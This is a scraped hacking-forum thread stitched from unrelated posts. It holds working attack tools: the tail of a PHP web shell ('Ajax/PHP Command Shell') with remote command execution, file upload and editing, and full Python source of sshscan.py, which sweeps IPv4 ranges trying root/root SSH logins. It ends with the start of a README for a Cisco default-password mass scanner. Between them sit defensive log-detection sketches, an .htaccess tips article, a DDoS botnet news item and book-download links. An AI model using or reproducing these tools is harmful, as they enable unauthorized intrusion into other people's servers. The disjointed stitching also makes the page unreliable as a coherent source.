document.getElementById('commandtab').innerHTML = newhtml; } function set_tab(newtab) { if(newtab == "cmd") { newhtml = ' <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>'; } else if(newtab == "upload") { runcommand('upload','GET'); newhtml = '<font size=0><b>This will reload the page... </b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>'; } else if(newtab == "workingdir") { <?php $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\""; $pathparts = explode("/",realpath (".")); foreach($pathparts as $folder) { $folders .= $folder."/"; } $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>"; ?> newhtml = '<?php print $folders; ?>'; } else if(newtab == "filebrowser") { newhtml = '<b>File browser is under construction! 
Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory'; runcommand('listdir .','GET'); } else if(newtab == "createfile") { newhtml = '<b>File Editor, under construction.</b>'; document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>"; } document.getElementById('commandtab').innerHTML = newhtml; } </script> </head> <body bgcolor=black onload="sf();" vlink=white alink=white link=white> <table border=1 width=100% height=100%> <td width=15% valign=top> <form name="extras"><br> <center><b>Quick Commands</b><br> <div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'> <?php foreach($functions as $name => $execute) { print ' <input type="button" value="'.$name.'" onclick="'.$execute.'"><br>'; } ?> </center> </div> </form> <center><b>Command history</b><br></center> <div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div> <br> <center><b>About</b><br></center> <div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'> <br> <b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist <br> Version <?php print $version; ?> <br> <br> <br>Thanks to everyone @ <a href="http://www.ironwarez.info" target=_blank>SharePlaza</a> <br> <a href="http://www.milw0rm.com" target=_blank>milw0rm</a> <br> and special greetings to everyone in rootshell </div> </td> <td width=70%> <table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0> <b style="cursor:crosshair" 
onclick="set_tab('cmd');">[Execute command]</b> <b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> <b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> <b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> <b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> </font></td> <tr> <td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div> <tr> <td height=1% width=100% valign=top> <div id="commandtab" style='height:100%;white-space:pre;overflow:auto'> <form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');"> <b>Command</b>: <input type=text name=command class=cmdthing size=100%><br> </form> </div> </td> </table> </td> </table> </body> </html> <?php } } else { print "<center><table border=0 height=100%> <td valign=middle> <form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\"> </form>"; } ?>
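From the defender's side, the shell above leaves a recognizable trace in web server access logs: every command is a GET carrying a runcmd query parameter, and file saves are POSTs to ?savefile (the p4ssw0rD login field travels in the POST body, so it does not appear in a default access log). The detection sketch below is an added example, not part of the original post; the log lines, the /images/cache.php path and the function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Prefix of the Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Command names the shell handles itself (taken from the PHP source in the
# post); anything else is handed to passthru/exec/system/shell_exec.
BUILTINS = {"canirun", "showinfo", "etcpasswdfile", "shellhelp",
            "upload", "about", "clear"}
BUILTIN_PREFIXES = ("changeworkdir ", "cd ", "editfile ",
                    "deletefile ", "listdir ")

# Constructed sample log (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2012:13:55:36 +0000] "GET /images/cache.php?runcmd=canirun HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:13:55:41 +0000] "GET /images/cache.php?runcmd=netstat%20-an%20%7C%20grep%20-i%20listen HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:13:56:02 +0000] "GET /images/cache.php?runcmd=editfile%20/var/www/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2012:13:56:30 +0000] "POST /images/cache.php?savefile HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Oct/2012:14:01:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Oct/2012:14:02:00 +0000] "GET /search.php?q=runcmd HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return a finding dict if the request matches the shell's protocol."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # keep_blank_values so that a bare "?savefile" still shows up as a key.
    params = parse_qs(url.query, keep_blank_values=True)
    base = {"ip": m.group("ip"), "path": url.path,
            "status": int(m.group("status"))}
    # Match on the parameter *name*; "q=runcmd" as a value is not a hit.
    if "runcmd" in params:
        cmd = params["runcmd"][0]
        low = cmd.lower()
        builtin = low in BUILTINS or low.startswith(BUILTIN_PREFIXES)
        kind = "builtin" if builtin else "os-command"
        return dict(base, kind=kind, detail=cmd)
    if "savefile" in params and m.group("method") == "POST":
        return dict(base, kind="file-write", detail="")
    return None


def scan(log_text):
    """Classify every line of a log and keep only the findings."""
    findings = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            findings.append(hit)
    return findings


def by_script(findings):
    """Group findings per script path: which clients drove it, and how."""
    grouped = defaultdict(lambda: {"clients": set(), "kinds": defaultdict(int)})
    for f in findings:
        entry = grouped[f["path"]]
        entry["clients"].add(f["ip"])
        entry["kinds"][f["kind"]] += 1
    return {path: {"clients": sorted(e["clients"]), "kinds": dict(e["kinds"])}
            for path, e in grouped.items()}


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(by_script(hits))
```

Any path reported by by_script is a file to pull for forensic review, together with its modification time and the upload or login that preceded the first hit.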
-
Snorby Cloud is an instantly deployable, usable, and hassle free Security Monitoring solution. Deploy your own Network & Host Security Monitoring solution in 5 minutes. Cloud Snorby TRIAL 24h
-
[python] CherryPy Essentials - Rapid Python Web Application Development (2007) Core Python Programming, 2nd Edition (2001) Dive Into Python (2004) Expert Python Programming (2008) Game Programming with Python, Lua, and Ruby (2003) Gray Hat Python - Python Programming for Hackers and Reverse Engineers Learning Python, 3rd Edition (2007) Making Use Of Python (2002) Mobile Python - Rapid Prototyping of Applications on the Mobile Platform (2007) Numerical Methods in Engineering with Python (2005) Download: http://www.mediafire.com/?1s4ya24bl48igr8 [perl] Advanced Perl Programming - O'Reilly Automating Windows with Perl - Miller Freeman Beginning Perl - Wrox 2000 Data Munging with Perl - Manning 2001 Extending and Embedding Perl - Manning 2003 Foy - Mastering Perl (O'Reilly, 2007) Graphics Programming with Perl - Manning 2002 Download: http://www.mediafire.com/?7757z7xaerny7tq
-
Move to Help XenoScanner
-
Incapsula security study reveals how a simple neglect in managing the administrative password of a small UK site was quickly exploited by Botnet shepherds operating obscurely out of Turkey to hurl large amounts of traffic at American banks. If you've been following the news, you are probably aware of a wave of DDoS attacks that recently hit several major U.S. banks. Izz ad-Din al-Qassam, a hacker group that claimed responsibility for these attacks, declared them to be a retaliation for an anti-Islam video that mocked the Prophet Muhammad and a part of the on-going “Operation Ababil.” As the reports of the attack started to roll in, the Incapsula security team was able to uncover one of the secret foot-soldiers behind the assault: a compromised general-interest UK-based website that was trying to hurl large chunks of junk traffic at three of the world's largest financial institutions (PNC, HSBC and Fifth Third Bank). On the eve of the attack, this website suddenly became a focal point of a rapidly increasing number of security events, caused by numerous requests with encoded PHP code payload. Incapsula was able to intercept these requests and traced them back to a backdoor shell that was used to hijack the site. The backdoor was installed before the website on-boarded Incapsula, and yet the cause of the security breach was clear. The administrative password was...you guessed it: admin / admin. After decoding the incoming PHP requests, the security team could clearly identify them as DDoS attack commands, originating from a Turkish web design company website which was used as a remote Botnet C&C. From the looks of it, the Turkish website was also compromised and used as an additional buffer between the real hacker and its U.S.-based targets. Further investigation showed that the UK website was a part of a Botnet for Hire which was working in “shifts” to produce HTTP and UDP flood attacks.
As the Incapsula team continued to block and monitor incoming DDoS commands, they saw that the list of targets went beyond American banks, also including e-commerce and commercial websites from several other countries. Incapsula published the full description of the DDoS attack in the company blog, concluding it by saying that this was just another demonstration of how security on the Internet is always determined by the weakest link. Simple neglect in managing the administrative password of a small UK site can very quickly be exploited by Botnet shepherds operating obscurely out of Turkey to hurl large amounts of traffic at American banks. Incapsula Security Analyst, Ronen Atias said: “This is a good example of how we are all just a part of a shared ecosystem where website security should be a shared goal and a shared responsibility.” Via: Under the hood of recent DDoS Attack on U.S. Banks - Hacking News
-
Reuze is a teeny-tiny front end framework that makes generating structure for blogs and article-heavy sites a breeze. It plays nice with other frameworks such as Foundation and Bootstrap but also works equally well on its own. Quickly create semantic HTML5 code blocks that conveniently sit in a 'namespaced' container and download the accompanying 10KB of CSS awesomeness from Github. It's responsive, IE8-friendly and topped up with RDFa Lite goodness! Reuze.me - A Generator of lightweight semantic HTML/CSS for content-driven sites
-
.htaccess is one file that every web admin should know and understand. At its basic level it controls access to your site's directories. But there is much more that you can do, as the snippets in this post will show you. If you would like to learn the basics of .htaccess, you should check out our Introduction to .htaccess article, which explains pretty well everything you will need to get you up and running. So, here are some useful tricks you can do with .htaccess:

1. Controlling Access to Files and Directories

Password protection is one thing, but sometimes you may need to completely block users from having the option of accessing a particular file or directory. This usually happens with system folders, such as the includes folder for which applications will need access but no users will ever need the privilege. To do this, paste this code into an .htaccess file and drop it in the directory:

deny from all

However, this will block access to everyone, including you. To grant yourself access you need to specify your IP address. Here is the code:

order deny,allow
deny from all
allow from xxx.xxx.xxx.xxx

xxx.xxx.xxx.xxx is your IP. If you replace the last three digits with 0/12 for example, this will specify a range of IPs within the same network, thus saving you the trouble to list all allowed IPs separately. If you want to block access to a particular file, including .htaccess itself, use the following snippet instead:

<Files .htaccess>
order allow,deny
deny from all
</Files>

Similarly, if you want to allow given IPs, list them with allow from. If you want to block access to particular file types, use this instead:

<FilesMatch "\.(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>

2. Disabling Directory Browsing

To prevent directory browsing, add this:

Options All -Indexes

However, if for some reason you want to enable directory browsing, change it to the following:

Options All +Indexes

3. Speeding-Up Load Times by Compressing Files

You can compress any type of file, not only images. For instance, to compress HTML files, use this:

AddOutputFilterByType DEFLATE text/html

To compress TEXT files, use this:

AddOutputFilterByType DEFLATE text/plain

You can also compress JavaScript, or add compression to multiple file types with one command:

AddOutputFilterByType DEFLATE application/javascript
AddOutputFilterByType DEFLATE application/rss+xml

Alternatively, if you want to compress all of your JavaScript, HTML, and CSS files with GZIP, you can use this:

<IfModule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_dechunk Yes
mod_gzip_item_include file \.(html?|txt|css|js|php|pl)$
mod_gzip_item_include handler ^cgi-script$
mod_gzip_item_include mime ^text\.*
mod_gzip_item_include mime ^application/x-javascript.*
mod_gzip_item_exclude mime ^image\.*
mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
</IfModule>

4. Protect Your Site against Hotlinking

If you don’t want your images hotlinked, add this to your .htaccess file:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?yourdomain.com [NC]
RewriteRule \.(jpg|jpeg|png|gif)$ - [NC,F,L]

Just replace yourdomain.com with your own and you are good to go.

5. Blocking Visitors Referred from a Particular Domain

If you have users from a particular domain you don’t welcome, you can ban them from your site. For instance, if your site gets listed in a place you don’t want traffic from (i.e. adult sites, blackhat sites, etc.), you can serve them with a 403 Forbidden page. You need to have mod_rewrite enabled but since it is usually on, you should be fine. Add this snippet:

<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_REFERER} bannedurl1.com [NC,OR]
RewriteCond %{HTTP_REFERER} bannedurl2.com [NC]
RewriteRule .* - [F]
</IfModule>

You need to replace bannedurl1.com and bannedurl2.com etc. with the domain names you want to blacklist. You may want to use the [NC] flag because it specifies that the domain name you’ve entered isn’t case sensitive. The [F] flag specifies the action to take – in this case to show the 403 Forbidden error. If you want to ban multiple sites, use the [NC,OR] flag for every domain but the last and if you want to ban a single domain use only the [NC] flag.

6. Blocking Requests from Particular User Agents

If your log files show particular user agents (bots or spiders) you can add a few lines to .htaccess and deny them access to your site:

RewriteEngine On
RewriteBase /
SetEnvIfNoCase Referer "^$" bad_user
SetEnvIfNoCase User-Agent "^badbot1" bad_user
SetEnvIfNoCase User-Agent "^badbot2" bad_user
SetEnvIfNoCase User-Agent "^badbot3" bad_user
Deny from env=bad_user

Replace badbot1, badbot2, etc. with the names of bots from your log files. This should keep such programs away from your site.

7. Caching Files

Another way to speed your site’s load times is via file caching. Here is what you need to add in order to cache files:

<FilesMatch "\.(flv|gif|jpg|jpeg|png|ico|swf|js|css|pdf)$">
Header set Cache-Control "max-age=2592000"
</FilesMatch>

You can add more file types (or remove some of them) to the sequence of files listed in this example – do what suits you. You can also use max-age to specify the amount of time in seconds that your files will live in the cache.

8. Disabling Caching for Particular File Types

If you don’t want to cache particular file types, it is easier not to include them in the cache sequence. However, sometimes files might get cached even if you don’t explicitly list them there and in this case you may want to disable caching only for them. Most often you will want to disable caching for dynamic files, such as scripts. Here is how to do it:

<FilesMatch "\.(pl|php|cgi|spl|scgi|fcgi)$">
Header unset Cache-Control
</FilesMatch>

Just pipe the files you want caching disabled for and this is it.

9. Bypassing the Download Dialogue

By default, when you try to download a file from a Web server, you get a dialogue that asks you if you want to save the file or open it. This dialogue is especially irritating with large media files or PDFs. If the files you have uploaded to your server are for downloads, you can save users the trouble and proceed straight to download. Here is what you need to set in .htaccess:

AddType application/octet-stream .pdf
AddType application/octet-stream .zip
AddType application/octet-stream .mp3

10. Renaming an .htaccess File

If for some reason, mostly security-related, you want to rename your .htaccess file, it is very easy to do it. In theory, renaming an .htaccess file shouldn’t cause problems with the applications running on your server but if by chance you notice such issues after you rename the file, just rename it back to its original name.

AccessFileName htac.cess

You also need to update any entries in the file itself or everywhere .htaccess is mentioned, otherwise you will be getting lots of errors.

11. Changing a Default Index Page

If you want your index page to be something different from the default index.html, index.php, index.htm, etc. this is very easy to do. Here is what you need to add to .htaccess:

DirectoryIndex mypage.html

Replace mypage.html with the actual URL of the page you want to use as index and you are done.

12. Redirecting to a Secure https Connection

If you are using https and you want to redirect users to the secure pages of your site, use this:

RewriteEngine On
RewriteCond %{HTTPS} !on
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}

13. Restricting File Upload Limits in PHP, Maximum Size of Post Data, Max Script Execution Time, etc.

.htaccess allows you to set some values that directly affect your PHP applications. For instance, if you want to impose upload limits in PHP, so that you don’t run out of hosting space because of large files, use this:

php_value upload_max_filesize 15M

Of course, you can set the value to anything you deem appropriate – 15M (MB) in this example isn’t fixed in stone. You can also restrict the maximum post size for uploading in PHP. To do it, add this:

php_value post_max_size 10M

Similarly, you can change 10M to any value that suits you. If you don’t want scripts to execute forever, you can limit their execution time with the help of the following:

php_value max_execution_time 240

240 is the number of seconds before the script will be terminated and as you guess, it could be any value. Finally, if you want to limit the time a script can parse input data, use this:

php_value max_input_time 180

And set any value in seconds that suits you.

14. Disguising File Types

Sometimes you wouldn’t like users to know the file types of the files on your site. One way to hide this information is if you disguise them. For instance, you can make all your files look as if they are HTML or PHP files:

ForceType application/x-httpd-php
ForceType application/x-httpd-php

There is much more that can be done with .htaccess. For instance, you can set automatic translation of your site’s pages, or set the server timezone, or remove the www from URLs, or use fancy directory listings, etc. In any case, before you start experiments with .htaccess, always backup the original .htaccess, so if things don’t go as planned, you have a working copy to revert to. Source
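Two mistakes are easy to make when adapting the snippets from sections 1 and 5: leaving [OR] on the last RewriteCond (the article says to use it on every domain but the last; a dangling [OR] lets the RewriteRule fire even when no listed referrer matched), and writing a FilesMatch pattern with an unescaped leading dot, which then matches far more file names than intended. The checker below is an added example, not part of the original article; the sample .htaccess text, file names and function names are constructed, and Python's re module stands in for Apache's regex engine on these simple patterns.

```python
import re

COND_RE = re.compile(r'^\s*RewriteCond\b.*\[([^\]]*)\]\s*$', re.I)
FILESMATCH_RE = re.compile(r'^\s*<FilesMatch\s+"?([^">]+)"?\s*>', re.I)

# Constructed .htaccess showing both mistakes.
SAMPLE = """\
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_REFERER} bannedurl1.com [NC,OR]
RewriteCond %{HTTP_REFERER} bannedurl2.com [NC,OR]
RewriteRule .* - [F]
</IfModule>
<FilesMatch ".(htaccess|htpasswd|ini|phps|fla|psd|log|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>
"""


def directives(text):
    """Yield (line_number, stripped_line) for non-blank, non-comment lines."""
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line and not line.startswith("#"):
            yield number, line


def trailing_or_conditions(text):
    """Line numbers of RewriteCond lines whose [OR] has no following condition."""
    rows = list(directives(text))
    hits = []
    for i, (number, line) in enumerate(rows):
        m = COND_RE.match(line)
        if not m:
            continue
        flags = {flag.strip().upper() for flag in m.group(1).split(",")}
        if not flags & {"OR", "ORNEXT"}:
            continue
        following = rows[i + 1][1] if i + 1 < len(rows) else ""
        if not following.lower().startswith("rewritecond"):
            hits.append(number)
    return hits


def unescaped_dot_patterns(text):
    """(line, pattern, suggested) for FilesMatch patterns starting with a bare dot."""
    hits = []
    for number, line in directives(text):
        m = FILESMATCH_RE.match(line)
        if m and m.group(1).startswith(".("):
            hits.append((number, m.group(1), "\\" + m.group(1)))
    return hits


def matched_names(pattern, names):
    """File names a FilesMatch pattern would apply to."""
    rx = re.compile(pattern)
    return [name for name in names if rx.search(name)]


if __name__ == "__main__":
    print("dangling [OR] on lines:", trailing_or_conditions(SAMPLE))
    names = ["catalog", "publish", "error.log", "deploy.sh"]  # constructed
    for line_no, loose, strict in unescaped_dot_patterns(SAMPLE):
        print("line", line_no)
        print("  as written:", matched_names(loose, names))
        print("  escaped   :", matched_names(strict, names))
```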
-
And what is it doing in Programming?
-
Could I get a PM with more details too?
-
@bahaoss so that all the noobs don't abuse them
-
sshscan is a horizontal SSH scanner that scans large swaths of IPv4 space for a single SSH user and pass. It uses iplist.txt as the input of IP addresses in the form of X.X.X.X, X.X.X.X/XX, X.X.X.X-X.X.X.X, or X.X.X.X-X with X-X in any octet. sshscan.py #!/usr/bin/env python # sshscan.py 0.9 - Horizontal SSH scanner # by dual (whenry) # # sshscan.py is a horizontal SSH scanner that scans large # swaths of IPv4 space for a single SSH user and pass. It # uses iplist.txt as the input of IP addresses in the form # of X.X.X.X, X.X.X.X/XX, X.X.X.X-X.X.X.X, or X.X.X.X-X with # X-X in any octect. # # Usage: python -u sshscan.py # # IP country database: # http://geolite.maxmind.com/download/geoip/database/GeoIPCountryCSV.zip # # #!/bin/bash # grep -i "$1" GeoIPCountryWhois.csv | awk -F, '{print $1"-"$2}' | sed -e 's/"//g' > iplist.txt # # checkServer function by Brad Peters - brad (at) endperform (dot) org # ipRange function from http://cmikavac.net/2011/09/11/how-to-generate-an-ip-range-list-in-python/ # # SSH with pexpect example: # http://linux.byexamples.com/archives/346/python-how-to-access-ssh-with-pexpect/ # # ---------------------------------------------------------------------------- # "THE BEER-WARE LICENSE" (Revision 42): # dual (@getdual) wrote gallerycgi. As long as you retain this notice you # can do whatever you want with this stuff. If we meet some day, and you think # this stuff is worth it, you can buy me a beer in return. 
dual # ---------------------------------------------------------------------------- import datetime, netaddr, os, pexpect, random, re, socket, sys # Define connection string, user, and pass CNNX = 'Are you sure you want to continue connecting' USER = 'root' PASS = 'root' # Convert an IP range into start and end IPs def rangeStr(testip): start_ip = [] end_ip = [] matchAll = re.search('(\d{1,3}\-\d{1,3}|\d{1,3})\.(\d{1,3}\-\d{1,3}|\d{1,3})\.(\d{1,3}\-\d{1,3}|\d{1,3})\.(\d{1,3}\-\d{1,3}|\d{1,3})', testip) for i in range(1, 5): matchRange = re.search('(\d{1,3})\-(\d{1,3})', matchAll.group(i)) if matchRange: start_ip.append(matchRange.group(1)) end_ip.append(matchRange.group(2)) else: start_ip.append(matchAll.group(i)) end_ip.append(matchAll.group(i)) start_ip_str = ".".join(map(str, start_ip)) end_ip_str = ".".join(map(str, end_ip)) return start_ip_str, end_ip_str # Generate an IP list given the first and last IPs def ipRange(start_ip, end_ip): start = list(map(int, start_ip.split("."))) end = list(map(int, end_ip.split("."))) temp = start ip_range = [] ip_range.append(start_ip) while temp != end: start[3] += 1 for i in (3, 2, 1): if temp[i] == 256: temp[i] = 0 temp[i-1] += 1 ip_range.append(".".join(map(str, temp))) return ip_range # Checks the SSH port def checkServer(ip_from_list): serverSocket = socket.socket() serverSocket.settimeout(0.5) try: serverSocket.connect((ip_from_list, 22)) except socket.error: return 1 # Attempt to connect to SSH def cnnxAttempt(target): child = pexpect.spawn('ssh %s@%s uname -a' % (USER, target)) try: i = child.expect([CNNX, '[Pp]assword: ', pexpect.EOF]) if i == 0: print "Sending 'yes'..." 
child.sendline('yes') i = child.expect([CNNX, '[Pp]assword: ', pexpect.EOF]) if i == 1: print "Sending password...", child.sendline(PASS) child.expect(pexpect.EOF, timeout=5) elif i == 2: print "Connection failed" pass # Print output print child.before output.write(child.before) except: print "Unexpected error:", sys.exc_info()[0] # Get date for output file today = datetime.datetime.now() date = today.strftime("%Y%m%dT%H%M") output_filename = 'sshscan-output-' + date + '.txt' input = open('iplist.txt', 'r') output = open(output_filename, 'w') # Randomize lines in input file rand_lines = input.readlines() random.shuffle(rand_lines) # Get total number of lines total_lines = len(rand_lines) count_lines = 0 # Iterate through IPs and check SSH for line in rand_lines: count_lines += 1 newline = line.strip() match_comments = re.search('^#', newline) if match_comments: continue match_ip = re.search('^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', newline) if match_ip: # If status is defined, we know the connection failed status = checkServer(newline) if status: print "%d/%d \tHost: %s \tPort: 22/closed" % (count_lines, total_lines, newline) else: print "%d/%d \tHost: %s \tPort: 22/open" % (count_lines, total_lines, newline) output.write('Host: ' + newline + '\tPort: 22/open\n') cnnxAttempt(newline) match_cidr = re.search('\/\d{1,2}$', newline) if match_cidr: # Randomize lines in netblocks ip_list = netaddr.IPNetwork(newline) rand_ip_list = list(ip_list) random.shuffle(rand_ip_list) # Get total number of IPs total_ips = len(rand_ip_list) count_ips = 0 for ip in rand_ip_list: count_ips += 1 # Don't scan network and broadcast addresses match_badip = re.search('\.(0|255)$', str(ip)) if match_badip: continue # If status is defined, we know the connection failed status = checkServer(str(ip)) if status: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/closed" % (count_lines, total_lines, count_ips, total_ips, str(ip)) else: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/open" % (count_lines, 
total_lines, count_ips, total_ips, str(ip)) output.write('Host: ' + str(ip) + '\tPort: 22/open\n') cnnxAttempt(str(ip)) match_dash = re.search('\d-\d', newline) if match_dash: match_whole = re.search('(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})-(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})', newline) if match_whole: ip_list = ipRange(match_whole.group(1), match_whole.group(2)) rand_ip_list = list(ip_list) random.shuffle(rand_ip_list) # Get total number of IPs total_ips = len(rand_ip_list) count_ips = 0 for ip in rand_ip_list: count_ips += 1 # Don't scan network and broadcast addresses match_badip = re.search('\.0|255$', str(ip)) if match_badip: continue # If status is defined, we know the connection failed status = checkServer(str(ip)) if status: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/closed" % (count_lines, total_lines, count_ips, total_ips, str(ip)) else: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/open" % (count_lines, total_lines, count_ips, total_ips, str(ip)) output.write('Host: ' + str(ip) + '\tPort: 22/open\n') cnnxAttempt(str(ip)) else: first_ip, last_ip = rangeStr(newline) ip_list = ipRange(first_ip, last_ip) rand_ip_list = list(ip_list) random.shuffle(rand_ip_list) # Get total number of IPs total_ips = len(rand_ip_list) count_ips = 0 for ip in rand_ip_list: count_ips += 1 # Don't scan network and broadcast addresses match_badip = re.search('\.0|255$', str(ip)) if match_badip: continue # If status is defined, we know the connection failed status = checkServer(str(ip)) if status: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/closed" % (count_lines, total_lines, count_ips, total_ips, str(ip)) else: print "%d/%d (%d/%d) \tHost: %s \tPort: 22/open" % (count_lines, total_lines, count_ips, total_ips, str(ip)) output.write('Host: ' + str(ip) + '\tPort: 22/open\n') cnnxAttempt(str(ip)) output.close() Source
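The script above tries one user and one password per host across many hosts, so each target sees a single failed login and per-host lockout thresholds never trip. The sketch below is an added example, not part of the original post: it assumes sshd "Failed password" lines from several hosts collected in one place (for example a central syslog server), and the log lines, host names and thresholds are constructed.

```python
import re
from collections import defaultdict

# Standard OpenSSH syslog line for a failed password attempt.
FAILED_RE = re.compile(
    r'^\w{3}\s+\d+ [\d:]{8} (?P<host>\S+) sshd\[\d+\]: '
    r'Failed password for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<src>\S+) port \d+'
)

# Constructed sample: one horizontal sweep, one classic single-host
# brute force, and one user mistyping a password.
SAMPLE_LOG = """\
Oct 12 03:14:07 web01 sshd[2211]: Failed password for root from 203.0.113.50 port 40112 ssh2
Oct 12 03:14:09 web02 sshd[1873]: Failed password for root from 203.0.113.50 port 51820 ssh2
Oct 12 03:14:12 web03 sshd[3020]: Failed password for root from 203.0.113.50 port 38844 ssh2
Oct 12 03:14:15 web04 sshd[1450]: Failed password for root from 203.0.113.50 port 44790 ssh2
Oct 12 03:14:19 db01 sshd[900]: Failed password for root from 203.0.113.50 port 60011 ssh2
Oct 12 03:20:01 db01 sshd[901]: Failed password for invalid user admin from 198.51.100.9 port 33001 ssh2
Oct 12 03:20:03 db01 sshd[901]: Failed password for invalid user test from 198.51.100.9 port 33001 ssh2
Oct 12 03:20:05 db01 sshd[901]: Failed password for invalid user oracle from 198.51.100.9 port 33001 ssh2
Oct 12 03:20:08 db01 sshd[905]: Failed password for root from 198.51.100.9 port 33017 ssh2
Oct 12 03:20:10 db01 sshd[905]: Failed password for root from 198.51.100.9 port 33017 ssh2
Oct 12 03:20:12 db01 sshd[905]: Failed password for root from 198.51.100.9 port 33017 ssh2
Oct 12 08:01:44 web02 sshd[1999]: Failed password for alice from 192.0.2.33 port 50222 ssh2
Oct 12 08:01:52 web02 sshd[1999]: Accepted password for alice from 192.0.2.33 port 50222 ssh2
"""


def parse(log_text):
    """Return (source_ip, target_host, user) for every failed password line."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line.strip())
        if m:
            events.append((m.group("src"), m.group("host"), m.group("user")))
    return events


def per_host_lockouts(events, threshold=5):
    """What a per-host rule sees: (source, host) pairs at or over threshold."""
    counts = defaultdict(int)
    for src, host, _user in events:
        counts[(src, host)] += 1
    return sorted(pair for pair, n in counts.items() if n >= threshold)


def horizontal_sweeps(events, min_hosts=4, max_per_host=2):
    """Sources that touch many hosts but stay under the radar on each one."""
    per_src = defaultdict(lambda: defaultdict(int))
    users = defaultdict(set)
    for src, host, user in events:
        per_src[src][host] += 1
        users[src].add(user)
    sweeps = []
    for src, hosts in per_src.items():
        if len(hosts) >= min_hosts and max(hosts.values()) <= max_per_host:
            sweeps.append({"src": src,
                           "hosts": sorted(hosts),
                           "users": sorted(users[src])})
    return sorted(sweeps, key=lambda row: row["src"])


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("per-host rule :", per_host_lockouts(ev))
    print("cross-host    :", horizontal_sweeps(ev))
```

On the sample, the per-host rule only sees the single-host brute force, while the cross-host aggregation is what surfaces the sweep.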
-
Compact mass scanner for Cisco routers with default telnet/enable passwords.

README

/*
Author: OverIP
        Andrea Piscopiello
        overip at gmail.com

Source: OCS v 0.2

License: GPL
         This program is free software; you can redistribute it and/or
         modify it under the terms of the GNU General Public License
         as published by the Free Software Foundation; either version 2
         of the License, or (at your option) any later version.

Email: Write me for any problem or suggestion at: overip at gmail.com

Date: 01/10/13

Read me: Just compile it with: gcc ocs.c -o ocs -lpthread
         Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy
         xxx.xxx.xxx.xxx=range start IP
         yyy.yyy.yyy.yyy=range end IP

PAY ATTENTION: This source is coded for only personal use on your own router Cisco. Don't hack around.

Special thanks to:
